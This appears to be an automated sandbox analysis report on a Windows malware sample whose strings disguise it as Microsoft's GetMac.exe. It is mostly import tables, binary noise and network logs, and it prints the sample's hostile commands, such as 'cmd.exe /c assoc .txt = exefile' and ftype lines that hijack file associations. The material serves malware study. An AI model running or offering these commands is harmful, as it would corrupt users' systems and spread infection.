MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE|}P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
3964344A5F101BBA10AF84388155DFBD
1FD3607D4327B50EB6EDDABE78C6FA87
D1B2D8671EFC317E434137437EEF4A96
370027142FF336DDB2EE9E351C47EDA5
D47BD13313C220FC81E2540FDD038E6A
4C247094201EB65DE12AA17F20575ED9
C0EBB4B8DA3C83D26A8B3D26DD87EF13
3FCA1C597375658EC140D733C9311DA3
2EB0BEC203F15FCAFBE54A3AEB8153C8
C9A73F27A1F08A33401C03AE976C5D7E
B927D056306928EE2117E24E1054A29D
??3@YAXPAX@Z
_wcsicmp
__CxxFrameHandler
wcscpy
wcslen
??2@YAPAXI@Z
wcstok
calloc
wcsstr
_CxxThrowException
_c_exit
_XcptFilter
_cexit
__winitenv
__wgetmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
msvcrt.dll
??1type_info@@UAE@XZ
_controlfp
?terminate@@YAXXZ
InterlockedIncrement
SetLastError
LocalAlloc
lstrlenW
FormatMessageW
lstrcatW
InterlockedDecrement
WriteConsoleW
GetStdHandle
lstrcpyW
GetLastError
QueryPerformanceCounter
GetTickCount
GetCurrentThreadId
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
LocalFree
GetModuleHandleA
KERNEL32.dll
wsprintfW
CharUpperW
LoadStringW
USER32.dll
WNetCancelConnection2W
WNetAddConnection2W
WNetGetLastErrorW
MPR.dll
CoTaskMemFree
CoTaskMemAlloc
CoCreateInstance
CoInitializeSecurity
CoInitializeEx
CoUninitialize
ole32.dll
OLEAUT32.dll
GetUserNameExW
Secur32.dll
WS2_32.dll
?GetData@CHString@@IBEPAUCHStringData@@XZ
??1CHString@@QAE@XZ
??4CHString@@QAEABV0@ABV0@@Z
?Mid@CHString@@QBE?AV1@H@Z
?Find@CHString@@QBEHG@Z
?FindOneOf@CHString@@QBEHPBG@Z
??4CHString@@QAEABV0@PBG@Z
??0CHString@@QAE@XZ
?Left@CHString@@QBE?AV1@H@Z
??YCHString@@QAEABV0@PBG@Z
?ReleaseBuffer@CHString@@QAEXH@Z
?GetBufferSetLength@CHString@@QAEPAGH@Z
??0CHString@@QAE@PBG@Z
?Format@CHString@@QAAXPBGZZ
?Compare@CHString@@QBEHPBG@Z
?Mid@CHString@@QBE?AV1@HH@Z
?Empty@CHString@@QAEXXZ
?SetAt@CHString@@QAEXHG@Z
framedyn.dll
NetWkstaTransportEnum
NetApiBufferFree
NetServerGetInfo
NETAPI32.dll
wcschr
strtok
wcstod
wcstol
wcsncmp
_wcsnicmp
realloc
fflush
fprintf
GetComputerNameExW
lstrcmpW
VerifyVersionInfoW
VerSetConditionMask
WideCharToMultiByte
lstrcpynW
FreeLibrary
GetProcAddress
LoadLibraryW
MultiByteToWideChar
ReadConsoleW
ReadFile
SetConsoleMode
GetConsoleMode
lstrcmpiW
FileTimeToSystemTime
GetTimeFormatW
.?AVCHeap_Exception@@
.?AV_com_error@@
D2E192607A17AC6F208337C2E9BD6ED8
5839768A110C2E1AE37D4B30E616A8E0
45D9BE838A5F02E4981469E912784E13
62922761BE57BD6822376BDD882E8512
88D4166C2D8D2F011CDE75124AF9DBDE
611EF0B0E3925FA7E5F2C9A49A3F74CA
5E6CF19822ED79427BBE1F90A46776D2
CF0F1DB2AD1508E38A847901CA6D6925
DD5A2D453888D99E53A6F2A747B16FEF
70715FB211BFEB27C59343934D6520D3
DC09B3988CA83766FA638BD76B3D69BC
F4B27592973B2DACC5CB728AC989760B
B6DEFBDE885C71A317B800A546D04269
7C4B4E11A0F2BC4A2D7ED76F40AA86F8
6A95831DF762742A1F232EB4A7B4BC71
083323F0D069CE9E11EE32193DF3BD9F
8D8245E75AA39808228F46E561D0EB9A
8E8709B31E29265928A9B6D04CFFF260
95ADFDA489635F3AAA1A8F9805686CE0
5417647A06E500065F2E2D598256B533
3F69BCF0B95B0808631680B175AD4D5E
FACA8262DE75016A9AC1BD4204BCEFFF
AC68D3937E744D8987E1E7A87D528A31
7D21374969C2D3C3B9C73950E875950F
6258BFA27674CC353246F35E854EB313
679B9E4CB770DFFD43F09724E2625A5D
585DCB59B27F5478F351CB176D0360A5
E087F1E9711D76EEC32E03B4F7F7488A
FA94434711060770DF67FD82E9AAB89D
529DAB9C6BCC6461A46CD4D0E98F9699
D286EEDA13CFA128A1D9082F07E3737C
cmd.exe
Md5_String_Calc
C:\123.bat
cmd.exe /c assoc .txt = exefile
cmd.exe /c ftype comfile=
cmd.exe /c ftype zipfile=
cmd.exe /c ftype jpgfile=
cmd.exe /c ftype txtfile=
znkzz
virus QQ 621370902
VS_VERSION_INFO
StringFileInfo
080404B0
CompanyName
FileDescription
LegalCopyright
LegalTrademarks
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
VarFileInfo
Translation
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Get MAC Address
FileVersion
5.1.2600.5512 (xpsp.080413-2108)
InternalName
GetMac.exe
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
GetMac.exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
5.1.2600.5512
VarFileInfo
Translation
Type the password for %s:1Passing the user credential on local connection.
7The Target system must be running Windows XP or above.
PInvalid Syntax. '%s' value is not allowed for '%s' option.
Type "%s" for usage.
KInvalid Syntax. Specify valid numeric value for '%s'.
Type "%s" for usage.
SInvalid Syntax. Specifiy valid floating point value for '%s'.
Type "%s" for usage.
HInvalid Syntax. Mandatory option '/%s' is missing.
Type "%s" for usage.
XInvalid Syntax. '%s' option is not allowed more than '%d' time(s).
Type "%s" for usage.
5Invalid Argument/Option - '%s'.
Type "%s" for usage.
BInvalid Syntax. Default argument is missing.
Type "%s" for usage.
FLength of the command line argument should not exceed 255 characters.
[Invalid Syntax. Default option is not allowed more than '%d' time(s).
Type "%s" for usage.
>Invalid Syntax. Value expected for '%s'.
Type "%s" for usage.
TInvalid Syntax. '%s' value is not allowed as default argument.
Type "%s" for usage.
ERROR:
WARNING:
SUCCESS:
Host Name
Connection Name
Network Adapter
Physical Address
Transport Name
GETMAC [/S system [/U username [/P [password]]]] [/FO format] [/NH] [/V]
Description:
G This command line tool enables an administrator to display the MAC
: address for one or more network adapters on a system.
Parameter List:
I /S system Specifies the remote system to connect to.
? /U [domain\]user Specifies the user context under
@ which the command should execute.
B /P [password] Specifies the password for the given
J user context. Prompts for input if omitted.
F /FO format Specifies the format in which the output
1 is to be displayed.
D Valid values: "TABLE", "LIST", "CSV".
F /V Specifies that the detailed information
@ should be displayed in the output.
G /NH Specifies that the "Column Header" should
= not be displayed in the output.
D Valid only for TABLE and CSV formats.
8 /? Displays this help/usage.
Examples:
GETMAC /FO csv
GETMAC /S system /NH /V
GETMAC /S system /U user
< GETMAC /S system /U domain\user /P password /FO list /V
> GETMAC /S system /U domain\user /P password /FO table /NH
N/AbERROR: Invalid Syntax. /U can be specified only when /S is specified.
Type "GETMAC /?" for usage.
bERROR: Invalid Syntax. /P can be specified only when /U is specified.
Type "GETMAC /?" for usage.
ERROR:
CSV|TABLE|LIST2ERROR: Invalid Syntax. User name cannot be empty.
iERROR: Invalid Syntax. /NH option is allowed only for TABLE and CSV formats.
Type "GETMAC /?" for usage.
Disconnected
Connecting...
Disconnecting
Hardware not present
Hardware disabled
Hardware malfunction
Media disconnected
Authentication
Authentication succeeded
Authentication failed
BERROR: Could not retrive information due to WMI version mismatch.
Disabled!INFO: No network adapters found.
@WARNING: user credentials cannot be used for local connections.
WARNING: =ERROR: The machine is located, but did not respond properly.
,ERROR: Machine is not found on the network.
1ERROR: Machine name is not a valid machine name.
AERROR: Workstation service is not running on the target machine.
4ERROR: Invalid Syntax. System name cannot be empty.
Type "GETMAC /?" for usage.
:"INFO: No network protocols found.
cmd.exe
Md5_String_Calc
C:\123.bat
cmd.exe /c assoc .txt = exefile
cmd.exe /c ftype comfile=
cmd.exe /c ftype zipfile=
cmd.exe /c ftype jpgfile=
cmd.exe /c ftype txtfile=
znkzz
virus QQ 621370902
VS_VERSION_INFO
StringFileInfo
080404B0
CompanyName
FileDescription
LegalCopyright
LegalTrademarks
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
VarFileInfo
Translation
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Get MAC Address
FileVersion
5.1.2600.5512 (xpsp.080413-2108)
InternalName
GetMac.exe
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
GetMac.exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
5.1.2600.5512
VarFileInfo
Translation
Type the password for %s:1Passing the user credential on local connection.
7The Target system must be running Windows XP or above.
PInvalid Syntax. '%s' value is not allowed for '%s' option.
Type "%s" for usage.
KInvalid Syntax. Specify valid numeric value for '%s'.
Type "%s" for usage.
SInvalid Syntax. Specifiy valid floating point value for '%s'.
Type "%s" for usage.
HInvalid Syntax. Mandatory option '/%s' is missing.
Type "%s" for usage.
XInvalid Syntax. '%s' option is not allowed more than '%d' time(s).
Type "%s" for usage.
5Invalid Argument/Option - '%s'.
Type "%s" for usage.
BInvalid Syntax. Default argument is missing.
Type "%s" for usage.
FLength of the command line argument should not exceed 255 characters.
[Invalid Syntax. Default option is not allowed more than '%d' time(s).
Type "%s" for usage.
>Invalid Syntax. Value expected for '%s'.
Type "%s" for usage.
TInvalid Syntax. '%s' value is not allowed as default argument.
Type "%s" for usage.
ERROR:
WARNING:
SUCCESS:
Host Name
Connection Name
Network Adapter
Physical Address
Transport Name
GETMAC [/S system [/U username [/P [password]]]] [/FO format] [/NH] [/V]
Description:
G This command line tool enables an administrator to display the MAC
: address for one or more network adapters on a system.
Parameter List:
I /S system Specifies the remote system to connect to.
? /U [domain\]user Specifies the user context under
@ which the command should execute.
B /P [password] Specifies the password for the given
J user context. Prompts for input if omitted.
F /FO format Specifies the format in which the output
1 is to be displayed.
D Valid values: "TABLE", "LIST", "CSV".
F /V Specifies that the detailed information
@ should be displayed in the output.
G /NH Specifies that the "Column Header" should
= not be displayed in the output.
D Valid only for TABLE and CSV formats.
8 /? Displays this help/usage.
Examples:
GETMAC /FO csv
GETMAC /S system /NH /V
GETMAC /S system /U user
< GETMAC /S system /U domain\user /P password /FO list /V
> GETMAC /S system /U domain\user /P password /FO table /NH
N/AbERROR: Invalid Syntax. /U can be specified only when /S is specified.
Type "GETMAC /?" for usage.
bERROR: Invalid Syntax. /P can be specified only when /U is specified.
Type "GETMAC /?" for usage.
ERROR:
CSV|TABLE|LIST2ERROR: Invalid Syntax. User name cannot be empty.
iERROR: Invalid Syntax. /NH option is allowed only for TABLE and CSV formats.
Type "GETMAC /?" for usage.
Disconnected
Connecting...
Disconnecting
Hardware not present
Hardware disabled
Hardware malfunction
Media disconnected
Authentication
Authentication succeeded
Authentication failed
BERROR: Could not retrive information due to WMI version mismatch.
Disabled!INFO: No network adapters found.
@WARNING: user credentials cannot be used for local connections.
WARNING: =ERROR: The machine is located, but did not respond properly.
,ERROR: Machine is not found on the network.
1ERROR: Machine name is not a valid machine name.
AERROR: Workstation service is not running on the target machine.
4ERROR: Invalid Syntax. System name cannot be empty.
Type "GETMAC /?" for usage.
:"INFO: No network protocols found.

DNS

Name Response Post-Analysis Lookup
dns.msftncsi.com A 131.107.255.255 131.107.255.255
dns.msftncsi.com AAAA fd3e:4f5a:5b81::1 131.107.255.255

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 53179 224.0.0.252 5355
192.168.56.101 49642 224.0.0.252 5355
192.168.56.101 137 192.168.56.255 137
192.168.56.101 61714 114.114.114.114 53
192.168.56.101 56933 114.114.114.114 53
192.168.56.101 138 192.168.56.255 138

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.